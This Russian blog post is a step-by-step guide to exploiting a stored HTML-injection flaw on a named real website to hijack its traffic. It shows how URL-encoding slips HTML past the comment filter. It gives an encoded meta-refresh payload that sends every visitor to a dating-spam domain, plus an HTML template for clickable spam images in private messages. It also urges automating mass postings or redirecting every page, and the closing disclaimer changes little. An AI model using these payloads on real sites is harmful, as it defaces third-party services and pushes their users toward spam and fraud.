Как получить весь трафик сайта

Всем привет!

Для начала хочу вас поздравить с наступающими праздниками, пожелать здоровья и удачи в новом году!

Речь в сегодняшней статье пойдет о HTML injection

Сама по себе уязвимость не нова, но актуальна по сегодняшний день. Вкратце с ее помощью можно внедрить свой html код, подробнее можно накопать инфы в поиске, а сейчас будет практика.

В качестве подопытного выбран сайт http://www.intherooms.com/

Вот как это работает --> В любую форму, в этом случае комментарий, мы вставляем любой закодированный html код, он сохраняется на странице и будет выполнен для каждого пользователя который посетил эту страницу.

А теперь давайте разбираться по порядку что и как сейчас произошло.

Для простого примера возьмем такой html код

<h1>MonteTraf</h1>

И попробуем вставить его в это же поле для комментария

Комментарий отобразился как обычный текст что мы видим на странице и в ее коде, тег <h1> это заголовок, то есть текст должен быть выделен. Судя по всему это защита от таких уязвимостей.

Но если мы закодируем эту же строку в urlencode

%3Ch1%3EMonteTraf%3C%2Fh1%3E

Пробуем вставить ее в комментарий и отправить

Видим следующее, сайт отрендерил наш текст как html документ и теперь осталось придумать как перенаправить максимум пользователей на нашу ссылку

Для тех кто не знает html быстрый гуглеж приведет к вот этому коду на редирект

<meta http-equiv="refresh" content="1;
URL=https://warm-datingsbook.com/?u="<meta/>

Если вставить ее в таком виде, ничего не получится как с примером выше, поэтому идем на https://meyerweb.com/eric/tools/dencoder/

Вставляем нужный код, нажимаем кнопку Encode и получаем готовый для инъекции текст

%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%22
1%3BURL%3Dhttps%3A%2F%2Fwarm-datingsbook.com%2F%3Fu%3D%22%3Cmeta%2F%3E

Результат работы этого кода вы посмотрели в начальном видео этой статьи.

О том что есть такая штука как html инъекции я узнал уже после слива с этого сайта, слышал конечно о sql инъекциях и xss уязвимостях.

Как я к этому пришел

Всегда нужно качественно проверять источник руками, все его реализации, то есть сайт, разные версии приложений и т.д.

В ходе тестов появилась интересная картина, на сайте ссылка кликабельна, в приложении нет. Если отправить сообщение на сайте и посмотреть входящее в приложении увидим результат снизу.

Такой момент заставил задуматься, а если вставить свой html код в сообщение и разослать все красиво.

Слепил такой кусок кода для шаблона в который можно подставить ссылки, креатив и картинку

<p style="text-align:left"><a href="http://google.com"><img src="https://s3d4.turboimg.net/sp/bbda68a29b1017d1137f1f1231c4ba7a/oxfol_com_32985239752395_25.jpg" width="425" height="300" /></a></p>
<h1>Creative + ?<br/> Site <a href="http://google.com">www.google.com</a> creative </h1>

Опять же кодируем его и отправляем сообщение, получаем следующий результат с кликабельной картинкой

Итог

Остается выбрать метод слива, автоматизировать отправку сообщений, комментариев, либо сделать редирект с каждой страницы сайта на ваш линк, как вариант вставить код на главной странице сайта в любую форму, вариантов очень много. Так же тут работает XSS, sql инъекции не тестил но скорее всего тоже есть.

Но опять же, такой способ является диким палевом и не известно как быстро такое пофиксят, всем успехов!

Ищите нестандартные подходы в вашей работе, пробуйте что-то новое, развивайтесь ну и мойте руки с мылом!

Статья создана для ознакомления и не является призывом к действию. Автор не несёт ответственности за ваши действия и их последствия!